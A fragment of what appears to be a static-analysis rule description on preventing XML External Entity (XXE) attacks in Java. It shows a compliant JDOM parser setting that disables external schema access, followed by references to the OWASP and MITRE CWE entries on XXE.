builder.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // Compliant
Document document = builder.build(new File(xml));

See
OWASP Top 10 2017 Category A4 – XML External Entities (XXE) https://www.owasp.org/index.php/Top_10-2017_A4-XML_External_Entities_(XXE)
OWASP XXE Prevention Cheat Sheet https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#java
MITRE, CWE-611 – Information Exposure Through XML External Entity Reference
MITRE, CWE-827 – Improper Control of Document Type Definition